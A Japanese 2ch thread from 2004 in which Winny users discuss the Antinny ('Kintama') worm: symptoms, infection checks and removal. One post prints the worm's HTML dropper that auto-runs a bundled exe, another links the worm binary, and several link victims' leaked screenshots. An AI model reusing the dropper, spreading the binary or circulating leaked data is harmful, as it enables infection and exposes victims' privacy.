634 :[名無し]さん(bin+cue).rar:04/03/16 11:03 ID:EByRDXtE
いや、ウイルスじゃないから

635 :現在の対応策はコレ:04/03/16 11:04 ID:DG9QUD3i
★★対応策

無視条件→リスト編集にコレをコピペしたらよろし。
             ↓    
[キンタマ] 俺のデスクトップ,,0,0,,0,1,1

で、リスト再読み込みで取り合えずこのウイルスが上げるファイルをnyネットワークから
排除OK(多分職人や鬼共有たちは当たり前にこの設定をするから、DOMはやらないと目的の
ファイルが落ち辛くなることが予想されます)

後は以下を実行してワクチンが出来るまで待つ。
●感染しているかの確認方法●
Upfolder.txtファイルがファイラーでみえているかと、
フォルダ情報に登録したことのない見えないフォルダのBbs2 or Cache2
のフォルダが登録してある。

●ワームの駆除方法●
前Winnyをフォルダごと削除後に、ダウソし直したNyを再設定
すればOK

●予防方法●
不用意に .exeファイルを実行しない。

ま、セキュリティの基本である、ネットに繋いだまま個人情報をPC上で取り扱わない。
を日頃から守っている用心深い私のような人間は別に感染しても無問題。
ま、ねらが喜ぶだけの単なるお祭りウイルスだね。作者はご苦労さん。

以上。

636 :[名無し]さん(bin+cue).rar:04/03/16 11:07 ID:dtN2qGxd
デスクトップに2GB以上おいておけばうpできないのかな?

637 :[名無し]さん(bin+cue).rar:04/03/16 11:09 ID:MNIf2lBd
>>636
そーみたいだね

638 :[名無し]さん(bin+cue).rar:04/03/16 11:10 ID:4ECEcnbk
中身が白紙のUpfolder.txtありました。
これってもうアウトですか・・・?

639 :[名無し]さん(bin+cue).rar:04/03/16 11:11 ID:DLEkiVTR
いや重いだろ。


640 :[名無し]さん(bin+cue).rar:04/03/16 11:11 ID:dtN2qGxd
upフォルダがないなら白紙でいいんじゃないの

641 :[名無し]さん(bin+cue).rar:04/03/16 11:12 ID:MvDvC2Sw
>636
うp出来る分だけうpするみたいだよ

642 :[名無し]さん(bin+cue).rar:04/03/16 11:12 ID:DLEkiVTR
面白いから対応策広めないでおこうぜ。

643 :[名無し]さん(bin+cue).rar:04/03/16 11:13 ID:T+7eLVGX
>>642
で、自爆してあぼ〜んか

644 :[名無し]さん(bin+cue).rar:04/03/16 11:14 ID:dtN2qGxd
nyで落としたexeファイルなんて踏む人いないとは思うけど

ロダにexeファイルあげて

リンクを

〜の画像
***.jpg    

ってexeを伏せて2ちゃんに貼ったらひっかかるのかな?

645 :[名無し]さん(bin+cue).rar:04/03/16 11:16 ID:olZ6KTKH
あふぉか。
実行する、保存する、キャンセルの三択が出るだけだろ。

646 :[名無し]さん(bin+cue).rar:04/03/16 11:16 ID:BneC1hhl

坂本龍一の伝説のラジオ番組、サウンドストリート。
一部ネット上で大量に出回っていることはご存知だと思いますが、
それにも限りがあります。
特に以下の三本を血眼で捜しておりますが、いまだ影すら見当たりません。
もしエアチェックをお持ちの方がいらっしゃいましたら、ぜひ縁故して放出してくださいませ。
よろしくお願いします。

1981年10月13日放送 ゲスト・村上龍
1984年09月25日放送 ゲスト・高橋悠治+如月小春
1985年01月29日放送 ゲスト・高橋悠治

647 :[名無し]さん(bin+cue).rar:04/03/16 11:17 ID:dtN2qGxd
ああそうだったね・・
じゃー普通はひっかからないね

648 :[名無し]さん(bin+cue).rar:04/03/16 11:17 ID:AYe4VNf7
キンタマのでっかい袋DLしたらタイピングオブザデッドが入ってたYO!!ワーイ

649 :[名無し]さん(bin+cue).rar:04/03/16 11:18 ID:XHv2OV0d
Upfolder.txt 自体無いのは?

650 :[名無し]さん(bin+cue).rar:04/03/16 11:18 ID:KEASA+RL

新作まだ〜〜〜〜?

651 :[名無し]さん(bin+cue).rar:04/03/16 11:18 ID:0OyHvXje
感染してるかどうかの判断だが、
PCを起動させてある程度時間おいてから
「キンタマ」とか「俺の」でHDD内をファイル検索するって
方法はどうか。

652 :[名無し]さん(bin+cue).rar:04/03/16 11:19 ID:m9KtyIHe
Ver.2.0β7.1の香具師はうpフォルダ追加できないバグに救われた予感

653 :[名無し]さん(bin+cue).rar:04/03/16 11:20 ID:Y1oGo5to
>●感染しているかの確認方法●
>Upfolder.txtファイルがファイラーでみえているかと、

これは不正確だよね
見えてても感染してるとは限らない

654 :[名無し]さん(bin+cue).rar:04/03/16 11:22 ID:r4Q0/NjP
>653
まあ見えてないならシロだと

655 :[名無し]さん(bin+cue).rar:04/03/16 11:22 ID:sdAUyO5U
感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏む
 (現在確認されてるのは 特典写真.jpg                              .exe)
感染確認方法
・Upfolder.txtに登録したことのないフォルダが登録される。
駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れなおす
症状
・感染したらnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取られる。
・デスクトップにあるファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh
 という形に圧縮してnyのupフォルダに置かれる。その時UpFolder.txtも書き換えられる。
・nyを接続すると知らない間にny経由でこれらを落とされる。
対策予防策
・推奨無視ワード「キンタマ」「デスクトップ」。
・今回に関わらず、nyで落とした.exeファイルの実行を控える。

暫定まとめサイト
http://myui.s53.xrea.com/kin/index.html


簡単にまとめ直し。
ここの住人ならこれで十分かと。
詳しくはまとめサイトへ。
要はexe踏むな、ですね。

656 :[名無し]さん(bin+cue).rar:04/03/16 11:24 ID:T+7eLVGX
なあ、今ウィルスバスターが更新されたっつーんでウィルスチェックしてたんだけどさ
肝心のキンタマウィルスは出なかったんだけどANTINNY.Bが発見されたんだけど・・・
やっぱマズいかねコレ

657 :[名無し]さん(bin+cue).rar:04/03/16 11:25 ID:n8MtqelF
前回の「ぬるぽウイルス」も今回の「キンタマウイルス」も47氏が流した
なんてことはないよなぁ・・・

658 :[名無し]さん(bin+cue).rar:04/03/16 11:32 ID:cpLw7P3B
>>655
http://www.geocities.jp/kim_virus/
http://chiakis-web.hp.infoseek.co.jp/kintama-v/
も、つけたせ

659 :[名無し]さん(bin+cue).rar:04/03/16 11:35 ID:FS54bkqg


        これが攻性防壁ってやつか!!!



660 :[名無し]さん(bin+cue).rar:04/03/16 11:35 ID:a4g+puAN


そして衝撃のチャット&ダウンロードしているファイル名(女子アナやアイドル)
http://no.m78.com/up/data/u027846.jpg
http://no.m78.com/up/data/u027805.jpg
http://no.m78.com/up/data/u027804.jpg
http://no.m78.com/up/data/u027831.jpg
http://no.m78.com/up/data/u027793.jpg


この5枚だけなんですか??? もっと見たい。
誰かうpしてくれる神いませんか?

661 :[名無し]さん(bin+cue).rar:04/03/16 11:37 ID:FY4hl9sJ
俺のデスクトップは落としても大丈夫?

662 :[名無し]さん(bin+cue).rar:04/03/16 11:44 ID:qZeVrC0m
upfolder.txtが無ければOK?

663 :[名無し]さん(bin+cue).rar:04/03/16 11:45 ID:EByRDXtE
別の意味で許されないが

664 :[名無し]さん(bin+cue).rar:04/03/16 11:51 ID:nXhtJGRT
こんなんで拡散減ったらいやだなあ…

665 :[名無し]さん(bin+cue).rar:04/03/16 11:52 ID:sdAUyO5U
感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏む。
 (現在確認されてるのは 特典写真.jpg                              .exe)
感染確認方法
・Upfolder.txtに登録したことのないフォルダが登録される。
駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れなおす
症状
・感染したらnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取られる。
・デスクトップにあるファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh
 という形に圧縮してnyのupフォルダに置かれる。その時UpFolder.txtも書き換えられる。
・nyを接続すると知らない間にny経由でこれらを落とされる。
対策予防策
・推奨無視ワード「キンタマ」「デスクトップ」。
・今回に関わらず、nyで落とした.exeファイルの実行を控える。

まとめサイト
http://www.geocities.jp/kim_virus/
http://myui.s53.xrea.com/kin/index.html
http://chiakis-web.hp.infoseek.co.jp/kintama-v/


>>658
付け足してみますた(・∀・)ニヤニヤ

666 :[名無し]さん(bin+cue).rar:04/03/16 11:56 ID:O4tZnpDc
137 :[名無し]さん(bin+cue).rar :04/03/16 11:50 ID:O4tZnpDc
UpFolder.txtに何も書いてないのはおk?
前にUpしててやめたとかで感染無しでもその状況になると思うのだが。


667 :[名無し]さん(bin+cue).rar:04/03/16 11:59 ID:MG1EuRQh
本日バスター04 パターン11.20をアップしたら
WORM_ANTINNY.Bを見つけやがった、、、、
レジのranには登録は無かったけどバスター金出して入れてんだから
頼むぜ、、、、これ以上後手に廻るなら又割るぞ

668 :[名無し]さん(bin+cue).rar:04/03/16 12:14 ID:4ECEcnbk
例のキンタマに感染してたっぽいのですが
OSの再インストールをすれば完全に駆除できるでしょうか・・・?

669 :[名無し]さん(bin+cue).rar:04/03/16 12:15 ID:PNvN19IW
>>631
登録アドレスにメールでwinny紹介文を送りつけるという話が

670 :[名無し]さん(bin+cue).rar:04/03/16 12:15 ID:fHXHq/jD
>>668
そりゃ駆除できるけど一度感染してファイルが広まってたら他の奴がキャッシュ保持してるから意味ないな

671 :[名無し]さん(bin+cue).rar:04/03/16 12:17 ID:SR3DaXg3
* 03/16 07:09:38 recv() 失敗
* 03/16 07:09:38 WSAENOTSOCK: The descriptor is not a socket.
* 03/16 07:09:38 send() 失敗
* 03/16 07:09:38 WSAENOTSOCK: The descriptor is not a socket.
* 03/16 07:16:04 recv() 失敗
* 03/16 07:16:04 WSAENOTSOCK: The descriptor is not a socket.
* 03/16 07:16:04 send() 失敗
* 03/16 07:16:04 WSAENOTSOCK: The descriptor is not a socket.

何これ?
(((( ;゚Д゚)))ガクガクブルブル

672 :[名無し]さん(bin+cue).rar:04/03/16 12:20 ID:pmtvmauR
>>671
モマエほどじゃないにしろ良く見かけるが

673 :[名無し]さん(bin+cue).rar:04/03/16 12:22 ID:2RVc2ccT
>>652
勝手に送信するらしいメールの方は対処しようが無いな…

674 :[名無し]さん(bin+cue).rar:04/03/16 12:24 ID:IujEkEFQ
>>673
OEの使用を止めれば良いと思われ・・・・。

675 :[名無し]さん(bin+cue).rar:04/03/16 12:27 ID:SR3DaXg3
>>672
初めて見たヨ…
とりあえず何なのか調べてみる

さっき初めてきんたま知ったもんだから何もかもが(((( ;゚Д゚)))ガクガクブルブルで…
冷静になります。スマソ

676 :[名無し]さん(bin+cue).rar:04/03/16 12:39 ID:TUdaYAsr
>>675
βακα....〆(゚▽゚*)

677 :[名無し]さん(bin+cue).rar:04/03/16 12:54 ID:myTa1Z7V
HDD検索してみたがキンタマなんてファイルは無かった
upfolder.txt開いても白紙だったし、更新日は去年の11月だった
大丈夫だよな・・・(((((((( ;゚Д゚)))))))

678 :[名無し]さん(bin+cue).rar:04/03/16 12:55 ID:4ECEcnbk
>>677
オレも同じような境遇だけどupfolder.txtが白紙だからって
安心しちゃだめとかなんとか・・・怖いからOS再インスコするよ・・・。

679 :[名無し]さん(bin+cue).rar:04/03/16 12:56 ID:tRu62Utd
【なおなおの】砂の器のVTR編集NY愛用か?【キンタマ】
http://ex4.2ch.net/test/read.cgi/siberia/1079385010/

ニュース速報[重要削除]
http://qb2.2ch.net/test/read.cgi/saku2ch/1079268087/4


WinnyでPC使用者名とデスクトップを晒す新種のワームが発生9
http://ex4.2ch.net/test/read.cgi/siberia/1079396032/

WinnyでPCの使用者名とデスクトップを晒す新種のワームが発生10
http://ex4.2ch.net/test/read.cgi/siberia/1079405105/

【デスクトップ】キンタマウイルスpart8【拡散】
http://tmp2.2ch.net/test/read.cgi/download/1079404532/

680 :625:04/03/16 12:57 ID:dYPBVNwM
>>628
え?それは分かってるんだが、そういうことはまだウィルス残ってるってこと?
削除法はないの?nyをやらないしかきんたまが動かない対処法はないの?

681 :[名無し]さん(bin+cue).rar:04/03/16 12:57 ID:1W36uBEO
今後nyやらなければインスコしなくてもOK?

682 :[名無し]さん(bin+cue).rar:04/03/16 12:59 ID:QGuvGaNM
とりあえずny起動は止めてトレンド・シマンテック情報を待つのが吉。

683 :[名無し]さん(bin+cue).rar:04/03/16 12:59 ID:1W36uBEO
>>682
いつ頃出そうですか?

684 :[名無し]さん(bin+cue).rar:04/03/16 13:03 ID:MNIf2lBd
1週間は我慢しろ

685 :[名無し]さん(bin+cue).rar:04/03/16 13:06 ID:4ECEcnbk
どこにどんな悪さしてるかわからないからな・・・
OS再インスコできな人はLANケーブル抜いた方がいいかも・・・

686 :[名無し]さん(bin+cue).rar:04/03/16 13:09 ID:/SHA1JTa
このワーム怖すぎ。
亜種が作られてキーロガーのログまでもUpされたりしたらいよいよ終わりだね。

687 :[名無し]さん(bin+cue).rar:04/03/16 13:14 ID:myTa1Z7V
あやしいファイルを踏まなきゃいいんだろ?
とりあえずここ半年落としたファイルで拡張子がexeの物は一つも無かった
でも怖えぇな・・・

688 :[名無し]さん(bin+cue).rar:04/03/16 13:18 ID:dYPBVNwM
え?ny起動してなくてもきんたま起動してんの?

689 :[名無し]さん(bin+cue).rar:04/03/16 13:19 ID:yIjw4SCx
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B

690 :[名無し]さん(bin+cue).rar:04/03/16 13:19 ID:NUNWGfku
29 名前:名無しさん@お腹いっぱい。[] 投稿日:04/03/16 12:51
トレンドマイクロはWORM_ANTINNY.Bきたみたい
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B

691 :[名無し]さん(bin+cue).rar:04/03/16 13:22 ID:DLEkiVTR
勝手にメール送る機能があるってどっかで見たな。
どこだったっけか>キンタマ

692 :[名無し]さん(bin+cue).rar:04/03/16 13:23 ID:QGuvGaNM
WORM_ANTINNY.Bがキンタマかどうかはまだ確定してないよ

693 :[名無し]さん(bin+cue).rar:04/03/16 13:27 ID:DLEkiVTR
あ、それとキンタマに感染しちゃった奴に対策を教えよう。
[キンタマ] 俺のデスクトップ ●● [04-03-xx](ファイル詰め合わせ).lzh

と言うファイルを作って流しまくれ。
中身は何でもいい。

694 :[名無し]さん(bin+cue).rar:04/03/16 13:32 ID:I0luQ6Kp
>>689
多分違うと思われ。
As its stealth mechanism, it uses the icon of TEXT files so that users are unable to detect it.
俺が見たのはテキストアイコンじゃなくて窓アイコンだった。
しかしこれ、破壊力なしなのに損害可能性は最高ってどういう事だろう?
エキサイト翻訳掛けてみたけど分からなかった。
症状解説できる人お願いします。

695 :[名無し]さん(bin+cue).rar:04/03/16 13:33 ID:SQTFVEJy
WORM_ANTINNY.B
WORM_ANTINNY.E

が同じ物な感じがする

696 :[名無し]さん(bin+cue).rar:04/03/16 13:34 ID:31E/Y2rZ
>>695
WORM_ANTINNY.Eなんかねえよ

697 :[名無し]さん(bin+cue).rar:04/03/16 13:38 ID:SQTFVEJy
シマンテックとトレンドマイクロじゃ呼び方が違うのか
W32.HLLW.Antinny
WORM_ANTINNY.A

698 :[名無し]さん(bin+cue).rar:04/03/16 13:41 ID:cpLw7P3B
>>696
あるよ

699 :[名無し]さん(bin+cue).rar:04/03/16 13:41 ID:cpLw7P3B
>>696
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html
のことだよ

700 :[名無し]さん(bin+cue).rar:04/03/16 13:41 ID:1G84rCta
キンタマ大人気ですね。作者も満足だろうなぁ……
Whiterとかいたずら系とかは今までもあったけど、今回のはアイデア賞ものだ。
NY崩壊とか言ってるけど、実際の所は起爆剤になってる予感。

ネトランはどう書くか……

701 :[名無し]さん(bin+cue).rar:04/03/16 13:42 ID:P5kwcM7w
>>691
MSNのなんか.NET関係の奴呼び出してるから
メールかもしれないしメッセかもしれないがメッセージを誰かに送るね。
どっちにしろ感染した香具師はny起動してなくても
しらないうちにMSNが悪さしちゃうかもってこった。
共有ファイルリスト付で!

702 :[名無し]さん(bin+cue).rar:04/03/16 13:42 ID:QGuvGaNM
Winnyを媒介に感染を拡げる新種のウイルス「Antinny.B」が発見される
〜拡張子を隠している場合もあるので、怪しいファイルには注意が必要
http://internet.watch.impress.co.jp/cda/news/2004/03/16/2448.html

703 :[名無し]さん(bin+cue).rar:04/03/16 13:44 ID:GDxAEvHz
ち、違うんだ!俺がUPしたんじゃないんだよ!
知らない間に勝手にキンタマが!
ほらキンタマが勝手に!俺のデスクトップを晒したんだって!
このスレみてみろって
いきなり逮捕とかイワレテモ意味わかんないよ
だってキンタマが
winnyは入ってるけど、ほら、ポエムしかUPしてないから
だからこの音楽ファイルとかはキンタマが

704 :[名無し]さん(bin+cue).rar:04/03/16 13:44 ID:MNIf2lBd
とりあえず、使用者名でパソコンの中を検索してみたけど
怪しいファイルは何もみつからなかった。

705 :[名無し]さん(bin+cue).rar:04/03/16 13:46 ID:omX9hdNM
カヨ面白すぎ

706 :[名無し]さん(bin+cue).rar:04/03/16 13:46 ID:Wx1HrFGQ
さっきシマンテックに本物と思われるキンタマ送ったから
今日中に対応してくれると思うよ
どうせアンチニーの亜種と判断されるんだろうなぁ

707 :[名無し]さん(bin+cue).rar:04/03/16 13:47 ID:omX9hdNM
うわ誤爆

708 :[名無し]さん(bin+cue).rar:04/03/16 13:52 ID:OMM+VO9r
SVCHOST.exeがあれば感染したということ?

709 :[名無し]さん(bin+cue).rar:04/03/16 13:53 ID:OPySOlvE
AntinnyB感染してた。
タスクマネージャからプロセス終了できんし。どうやってファイル削除すりゃええの?

710 :[名無し]さん(bin+cue).rar:04/03/16 13:53 ID:HCbzfa/u
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B&VSect=T

ウイルスサイズ: 1,238,528 Bytes

ってなってるなぁ・・・

711 :[名無し]さん(bin+cue).rar:04/03/16 13:53 ID:Wx1HrFGQ
>>708
そう、全部削除すれば一応大丈夫

712 :[名無し]さん(bin+cue).rar:04/03/16 13:54 ID:4ECEcnbk
>>708早まるな
ttp://support.microsoft.com/default.aspx?scid=kb;ja;250320

713 :[名無し]さん(bin+cue).rar:04/03/16 13:55 ID:37PPJCpe
ノーd先生はまだですか?

714 :[名無し]さん(bin+cue).rar:04/03/16 13:55 ID:dYPBVNwM
どうなのよ〜?
きんたまってny起動してなくても広がるの?

715 :[名無し]さん(bin+cue).rar:04/03/16 13:55 ID:OMM+VO9r
>>712
thx!


716 :[名無し]さん(bin+cue).rar:04/03/16 13:56 ID:QGuvGaNM
>>709
良ければアンタのnyのフォルダの状態教えてよ。
うpフォルダに自分のキンタマファイルがあったかどうか等。

717 :[名無し]さん(bin+cue).rar:04/03/16 13:56 ID:MNIf2lBd
SVCHOST.exeなんか普通に入ってるよ

718 :[名無し]さん(bin+cue).rar:04/03/16 13:57 ID:Kk/8ofs2
http://internet.watch.impress.co.jp/cda/news/2004/03/16/2448.html

719 :[名無し]さん(bin+cue).rar:04/03/16 14:04 ID:Wx1HrFGQ
crc e837のファイルバイナリエディタで開いてみた
確実にこれだわ


既出だけど

こんにちわ!%sの%sです(^_^)/
Winnyというとっても便利なツールをゲットしてしまいました
インターネットに繋いでおくだけで色々なゲームやアプリがタダで手に入る優れものです。
なんと公開前の映画まで流れているんだからビックリです。
@ いつも落としてばかりでは悪いので、私もファイルを流してみますね。
誰か落としてくれるかな・・・(O_O)ドキドキ
まだまだWinny初心者ですがですが、これからもどんどんアップするので、
よろしくお願いします(^o^)/


この文が入ってた




あと

@ ∧_∧
・∀・)   | | ガッ
と    )    | |
  Y /ノ    人
   / )    <  >__Λ∩
  _/し' //. V`Д´)/ ←
(_フ彡

このaaが入ってた

720 :709:04/03/16 14:04 ID:OPySOlvE
UpFolder.txtにはBBSでダウンフォルダが指定されている。
ダウンフォルダは2週間くらいまえからからっぽのままなのでキンタマとは違う?
キャッシュもいじられていないと思う。
消そうとしたファイルはmsportss.exe。プロセスを終了しようとすると
「アクセスが拒否されました」と出る。OSはWin2k SP3


721 :[名無し]さん(bin+cue).rar:04/03/16 14:06 ID:31E/Y2rZ
>>719
マジか
うpしる

722 :[名無し]さん(bin+cue).rar:04/03/16 14:09 ID:rjaYQfOJ
>>719
やぱり
ぬる〜はwinny媒介ワームにつきものなのか

723 :[名無し]さん(bin+cue).rar:04/03/16 14:12 ID:Wx1HrFGQ
ftp://nekoko.zive.net/upload/file2961.txt

俺が落としたキンタマ本体

いま落とせるかどうかはしらん


4A67FからぬるぽのAA

724 :[名無し]さん(bin+cue).rar:04/03/16 14:13 ID:HCbzfa/u
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B&VSect=T

トレンドマイクロのWORM_ANTINNY.Bは、
Winnyのshareフォルダを探すプログラム自体をWORM_ANTINNY.Bとして検出する模様。

おそらく今回のキンタマにもそれが使用されていて、その他のプログラム
(スクリーンショット・圧縮ファイル・メール作成、自動起動登録など)と同時に感染してその効果を発揮するのではないかと思われ。

725 :[名無し]さん(bin+cue).rar:04/03/16 14:17 ID:31E/Y2rZ
>>723
俺のと中身同じだけどサイズが違う
今うpする

726 :[名無し]さん(bin+cue).rar:04/03/16 14:18 ID:7apK52Ys
ちょっと質問させてください
感染したか確認するのに
ノード切断状態でうpフォルダ内とキャッシュを検索に反映させて、nyの検索「キンタマ」
システム情報及びフォルダ情報にうpファイル個数が0とでていれば
まず安心して大丈夫なんですか?

727 :[名無し]さん(bin+cue).rar:04/03/16 14:20 ID:dYSaUoru
キエターーーーーーーーーーーー????

728 :709:04/03/16 14:23 ID:OPySOlvE
>>724
そうじゃなくて、トップに書いてある1,238,528バイトのファイルではなくて、
233,472バイトのファイルの方をAntinnyBとして検出します。という意味だとおもうぞ?

729 :[名無し]さん(bin+cue).rar:04/03/16 14:24 ID:31E/Y2rZ
やっぱやめた
うpろだにうpして感染して俺のせいになったらシャレにならん

730 :[名無し]さん(bin+cue).rar:04/03/16 14:25 ID:HCbzfa/u
>>728 そういう意味で書いたのだが、わかりにくかったらすまん

731 :[名無し]さん(bin+cue).rar:04/03/16 14:26 ID:Wx1HrFGQ
何にも知らずに面白がって詰め合わせダウソして
htmlとかアイコン偽装exeクリックしたアホいっぱい居るだろうなぁ


732 :[名無し]さん(bin+cue).rar:04/03/16 14:27 ID:ZPVfiPt4
キンタマウィルスでうぷされてたjpgいろいろ落して見てたんだけど
PC再起動した後、からWinny立ち上げるとcpuが100%消費されて応答なしになる・・('A`)
nyがすぐ固まるようになったのでnyできないよウワァァァンヽ(`Д´)ノ
しょうがないのでOS再インストールしてくる(´;ω;`)


733 :[名無し]さん(bin+cue).rar:04/03/16 14:27 ID:HCbzfa/u
ああ、>>710>>724 とはつながりのないレスだす。

734 :[名無し]さん(bin+cue).rar:04/03/16 14:32 ID:Wx1HrFGQ
詰め合わせに

>>719の文面とか

「去年まで金無し君だったけど」
「いつもお世話になっております」

とかで始まるtxtが入ってるらしいけど本当に.txtファイルだった?

735 :[名無し]さん(bin+cue).rar:04/03/16 14:45 ID:JvLWH9wr
Winny使わなければいいんだよ

736 :[名無し]さん(bin+cue).rar:04/03/16 14:46 ID:Wx1HrFGQ
PC使わなければいいんだよ

737 :[名無し]さん(bin+cue).rar:04/03/16 14:48 ID:BUS+tJa4
生まれなければ良かったんだよ。

738 :[名無し]さん(bin+cue).rar:04/03/16 14:50 ID:Q7TwZDIg
キ ン タ マ に か か っ た 貴 様 に 生 存 権 な ど な い

739 :[名無し]さん(bin+cue).rar:04/03/16 14:53 ID:mX9uSN+o
会社(学校)+本名とか出た人いるの?
出ちゃったらどうするんだろな、誰かの捏造だ!とでも言うんだろうか。

740 :[名無し]さん(bin+cue).rar:04/03/16 14:54 ID:dYPBVNwM
どうなのよ〜?
きんたまってny起動してなくても広がるの?

741 :[名無し]さん(bin+cue).rar:04/03/16 14:54 ID:cN3iYznY
ファイルを一つ捕獲しました

展開前のファイル:
[キンタマ] 俺のデスクトップ ○○ ○○ (xxxxxx xxxxx) [04-03-10](ファイル詰め合わせ).zip

内容:
住所録.htm   201byte
data1/000.exe 376,832byte

MD5(住所録.htm)= 4d3501d6862086acd3cd203982a9a8cb
MD5(data1/000.exe)= c399e5dd7999ed43ea705a36bdf026ea

住所録.htm:
<html><head><title></title>
<object CLASSID='CLSID:00000000-0000-0000-0000-FFF085324649' CODEBASE='data/000.exe'></object>
<script>window.location = "./";</script>
</head><body></body></html>

000.exe が例のブツとおもわれる
アイコンはWindowsXPのアイコンと同じなので、間違って実行しないように注意

742 :[名無し]さん(bin+cue).rar:04/03/16 14:54 ID:OMM+VO9r
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=37341

W32.HLLW.Antinny.E
ウィルス名:
W32.HLLW.Antinny.E
別名:
感染場所:
性質: ワイルド

史上最高評価「ワイルド」が付いた奇跡のきんたま


743 :[名無し]さん(bin+cue).rar:04/03/16 14:56 ID:Q7TwZDIg
恐るべしキンタマ。ぬるぽに続いて有名になりそうだな。

744 :[名無し]さん(bin+cue).rar:04/03/16 14:56 ID:QGuvGaNM
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.e.html
Eってこれだね

745 :[名無し]さん(bin+cue).rar:04/03/16 14:57 ID:Wx1HrFGQ
潜伏期間がたった10〜20日だったのが激しく惜しいw

746 :[名無し]さん(bin+cue).rar:04/03/16 15:07 ID:LkxqLp9Q
このウイルス、HDDフォーマットより質悪いな…
社会的あぼんをねらっているとしかw
http://tmp2.2ch.net/test/read.cgi/download/1079384794/50
http://tmp2.2ch.net/test/read.cgi/download/1079384794/72
http://tmp2.2ch.net/test/read.cgi/download/1079384794/92
http://tmp2.2ch.net/test/read.cgi/download/1079384794/97
http://tmp2.2ch.net/test/read.cgi/download/1079384794/113
http://tmp2.2ch.net/test/read.cgi/download/1079384794/230
http://tmp2.2ch.net/test/read.cgi/download/1079384794/251
http://tmp2.2ch.net/test/read.cgi/download/1079384794/276
http://tmp2.2ch.net/test/read.cgi/download/1079384794/330
http://tmp2.2ch.net/test/read.cgi/download/1079384794/405
http://tmp2.2ch.net/test/read.cgi/download/1079384794/529
http://tmp2.2ch.net/test/read.cgi/download/1079384794/736
http://tmp2.2ch.net/test/read.cgi/download/1079384794/776


747 :[名無し]さん(bin+cue).rar:04/03/16 15:07 ID:hGe3AEK0
キンタマを馬鹿にしてはいけない

748 :[名無し]さん(bin+cue).rar:04/03/16 15:12 ID:Wx1HrFGQ
キンタマを馬鹿にしたものはキンタマに泣く

749 :キンタマ デスクトップ:04/03/16 15:13 ID:SE469Znd
(お宝) アナ ハプニング某女子アナの健康診断番組で、看護婦が検査着まくると胸が丸出しに!.avi

やめとけ。

750 :[名無し]さん(bin+cue).rar:04/03/16 15:14 ID:hGe3AEK0
神棚においなりさんをお供えしましょう

751 :[名無し]さん(bin+cue).rar:04/03/16 15:20 ID:TJn3UCFL
こちとら12000のキンタマクラスタと

ダウソ板がついてるんだから

負けてらんないのよ〜!!
       / .:.:. / ̄  \  _,,,,-‐'''"   \, へ、
     / .:.:/ /\.:.:    /            ヽ
     /.:.:.:,‐'" 〈.:.:.:.:\.:.:.: /.:.:___,,,,-‐ __.:.:_,,,,-‐.:.:   `、,,_
   _,,,-''"    |\.:.:.`''/_..-'/,,-‐''"∠..,,,,,,/_,,,,-‐  __ ヽ、
--‐''        |,ィ'⌒゙ヽiイ´ // , " ̄`ヽi! /// .:  ヽ、`ヽ、
      .:.   〈 (~< レ  '´  ' ..,,_('ッ ゙i!/'´ //|.:.:   \
   _,,,-''.:.   .:.:.\ `        ,,、、´゜、、、 __,,,,.../ ::|.:.:|.:.: |
--‐''.:.:.:.:/::  .:.:.:.:./´`T            ,,_(ッ,ノ /.:.: / :/|.: /
.:.:.:.:.:.:/.:.:.:.:.:./:::/            /~⌒ヽ、-/゙//| :/|/ |/   从___人/(____
---‐-、____,、-‐<           /⌒゙ヽ  ヽ>  / |/ |/ __)`-ー-'
;;;;;;;;;;;;;;;;;;;;;;;;;;;ヾ、'、        /‐-、_ 〉 / , '     >
;;;;;;;;;;;;;;;;;,,,,-‐'''"\\__\   `ヽ-、;_/ ,,-''      \
 ̄ ̄^i;;;;;;;;;;`-;;;;;;;) \ノ::::´`ヽ、   ,, - "ヽ、        )あんたたちなんかにぃ〜(tbs
::::::::::::::|;;;;;;;;;;;;;;;∠-‐'''"`-、:.:.:.:.: `''''".:.:.:.:.:.  '、      ∠
::::::::::::::::\;;;;;;;;;/::::\|;;;|;;;ヽ、:.:.:.:.:.:.:∧.:.:.:.:.:. ',       〕
\::::::::::::::::|;;;;;/::::::::::::/;;;/;;;;;;;;|.:.:.:.:.:. / |.:.:|\: i     /
:::::\:::::::::::`‐'::::::::::::/;;;/;;;;;;;;;/.:.:.:.:/ //  |: /      ̄ ̄)/W⌒\(~~∨⌒ヽ

752 :[名無し]さん(bin+cue).rar:04/03/16 15:22 ID:S0HQrZNV
>>749
aviファイルのウイルスってあるの?

753 :[名無し]さん(bin+cue).rar:04/03/16 15:24 ID:hbLks8Zg
あるといえばある
ないといえばない

754 :709:04/03/16 15:25 ID:OPySOlvE
ファイルをエディタで開いてみた。>>719のような文は見つからなかった。
相変わらずファイル消すことできず。

755 :[名無し]さん(bin+cue).rar:04/03/16 15:26 ID:hGe3AEK0
( ゚Д゚)ノω  キンタマヤルヨ

756 :[名無し]さん(bin+cue).rar:04/03/16 15:27 ID:S8trrcr0
>>752
ある。

757 :749:04/03/16 15:28 ID:SE469Znd
言葉足らずでごめん
ウイルスではなくてグロ

758 :[名無し]さん(bin+cue).rar:04/03/16 15:28 ID:ZdiiB+D9
>>754
ノートン持ってるなら検疫しちゃえば?

759 :[名無し]さん(bin+cue).rar:04/03/16 15:29 ID:Wx1HrFGQ
antinny.Bとキンタマは別物

760 :[名無し]さん(bin+cue).rar:04/03/16 15:29 ID:9j5v/02+
シリアル.folder
なんかの拡張子.folderってのもあるね。
ファイルの種類が「フォルダ」だからコレに引っかかるやつは多いんじゃないの?
内容はhtml同様でソースに>>741みたいな記述がある
